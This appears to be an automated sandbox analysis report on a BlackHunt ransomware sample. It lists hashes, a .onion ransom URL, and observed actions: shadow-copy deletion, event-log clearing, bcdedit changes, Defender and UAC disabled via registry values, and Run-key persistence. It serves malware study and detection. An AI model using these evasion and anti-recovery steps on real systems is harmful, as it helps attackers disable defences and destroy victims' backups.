Analysis
-
max time kernel
125s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:03
Static task
static1
Behavioral task
behavioral1
Sample
d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe
Resource
win10v2004-20231215-en
General
-
Target
d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe
-
Size
707KB
-
MD5
b8bdbd0d767090a8e35b50b776fa3c0a
-
SHA1
b1610559eb3c656b158dd34c1f06be5a8b270ef0
-
SHA256
d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553
-
SHA512
15987100d08fd2fdfe6f268ed50cc4c40e155b6bf4492d07bde15677c5bc011c8c59522ea30376f27ca7473ef86010b0e2aad1fbb25cc8db6eb97e57524f9007
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1D8kvnh:6uaTmkZJ+naie5OTamgEoKxLWCah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 15036 fsutil.exe 7956 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2228 wevtutil.exe 15356 wevtutil.exe 15292 wevtutil.exe 14968 wevtutil.exe 2572 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8092 bcdedit.exe 8780 bcdedit.exe 12824 bcdedit.exe 15012 bcdedit.exe -
Renames multiple (3373) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7936 wbadmin.exe 9432 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\A: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\H: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\Z: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\Q: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\L: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\T: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\Y: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\O: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\X: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\G: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\I: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\J: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\U: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\B: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\N: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\S: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\V: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\K: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\M: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened (read-only) \??\R: d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jawt.lib d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ar-ae\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_history_18.svg d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\he-il\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\selector.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyFolder_160.svg d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#BlackHunt_ReadMe.hta d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\AddressBook2x.png d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#BlackHunt_Private.key d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jconsole.jar d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#BlackHunt_ReadMe.txt d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6348 1140 WerFault.exe 292 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4268 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4968 vssadmin.exe 868 vssadmin.exe 7648 vssadmin.exe 15140 vssadmin.exe 1312 vssadmin.exe 3912 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 8168 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 9068 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeRestorePrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeBackupPrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeTakeOwnershipPrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeAuditPrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeSecurityPrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeIncBasePriorityPrivilege 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Token: SeBackupPrivilege 4416 vssvc.exe Token: SeRestorePrivilege 4416 vssvc.exe Token: SeAuditPrivilege 4416 vssvc.exe Token: SeBackupPrivilege 14452 wbengine.exe Token: SeRestorePrivilege 14452 wbengine.exe Token: SeSecurityPrivilege 14452 wbengine.exe Token: SeSecurityPrivilege 2228 wevtutil.exe Token: SeBackupPrivilege 2228 wevtutil.exe Token: SeSecurityPrivilege 2572 wevtutil.exe Token: SeBackupPrivilege 2572 wevtutil.exe Token: SeSecurityPrivilege 15356 wevtutil.exe Token: SeBackupPrivilege 15356 wevtutil.exe Token: SeSecurityPrivilege 15292 wevtutil.exe Token: SeBackupPrivilege 15292 wevtutil.exe Token: SeSecurityPrivilege 14968 wevtutil.exe Token: SeBackupPrivilege 14968 wevtutil.exe Token: SeDebugPrivilege 8168 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4956 wrote to memory of 3428 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 90 PID 4956 wrote to memory of 3428 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 90 PID 4956 wrote to memory of 3012 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 92 PID 4956 wrote to memory of 3012 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 92 PID 4956 wrote to memory of 4452 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 94 PID 4956 wrote to memory of 4452 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 94 PID 4956 wrote to memory of 3668 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 96 PID 4956 wrote to memory of 3668 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 96 PID 4956 wrote to memory of 2640 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 98 PID 4956 wrote to memory of 2640 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 98 PID 3428 wrote to memory of 4684 3428 cmd.exe 99 PID 3428 wrote to memory of 4684 3428 cmd.exe 99 PID 3012 wrote to memory of 2516 3012 cmd.exe 101 PID 3012 wrote to memory of 2516 3012 cmd.exe 101 PID 4452 wrote to memory of 1060 4452 cmd.exe 102 PID 4452 wrote to memory of 1060 4452 cmd.exe 102 PID 4956 wrote to memory of 3608 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 103 PID 4956 wrote to memory of 3608 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 103 PID 3668 wrote to memory of 4496 3668 cmd.exe 106 PID 3668 wrote to memory of 4496 3668 cmd.exe 106 PID 4956 wrote to memory of 872 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 105 PID 4956 wrote to memory of 872 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 105 PID 4956 wrote to memory of 2448 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 108 PID 4956 wrote to memory of 2448 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 108 PID 2640 wrote to memory of 5032 2640 cmd.exe 109 PID 2640 wrote to memory of 5032 2640 cmd.exe 109 PID 4956 wrote to memory of 2916 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 114 PID 4956 wrote 